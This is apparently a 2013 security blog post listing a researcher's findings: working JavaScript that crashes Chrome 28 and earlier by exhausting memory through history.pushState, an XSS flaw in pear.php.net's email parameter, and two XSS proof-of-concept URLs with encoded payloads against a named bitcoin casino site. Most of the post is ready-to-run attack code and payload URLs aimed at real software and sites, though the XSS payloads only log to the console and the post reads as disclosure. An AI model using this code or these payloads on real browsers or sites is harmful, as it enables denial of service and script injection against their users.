- Google Chrome <= 28 DoS (by memory exhaustion) using history.pushState
<script> var r="BOMB!";for(var e=0;e<22;e++){r+=r;} for(var d=0;d<100000;d++) { history.pushState({},r); } </script>Live demo
On android 4.2.2 @ nexus 7 this is quicker:<script> var r="";for(var e=0;e<1000000;e++){r+=String.fromCharCode(1+Math.floor(Math.random()*254));} history.pushState({},r,r); </script>
- pear.php.net XSS
http://pear.php.net/support/lists.php (Email parameter was neither validated nor sanitized)
- satoshiroulette.com (bitcoin casino) XSS :
Examples:
http://satoshiroulette.com/game-info.php?mode=BTC&game=%3C/title%3E%3Cbody%20onload=%22javascript:console.log%28%27XSS%27%29%22%20/%3E
http://satoshiroulette.com/render_address_roulette.php?mode=BTC&game=%3Cbody%20onload=%22javascript:console.log%28%27XSS%27%29%22%20/%3E
Monday, July 22, 2013
In the meantime...
Recently, when I have some spare time, I'm finishing my own project which I hope to release soon. However, apart from that project I have also found:
Subscribe to:
Post Comments (Atom)
No comments:
Post a Comment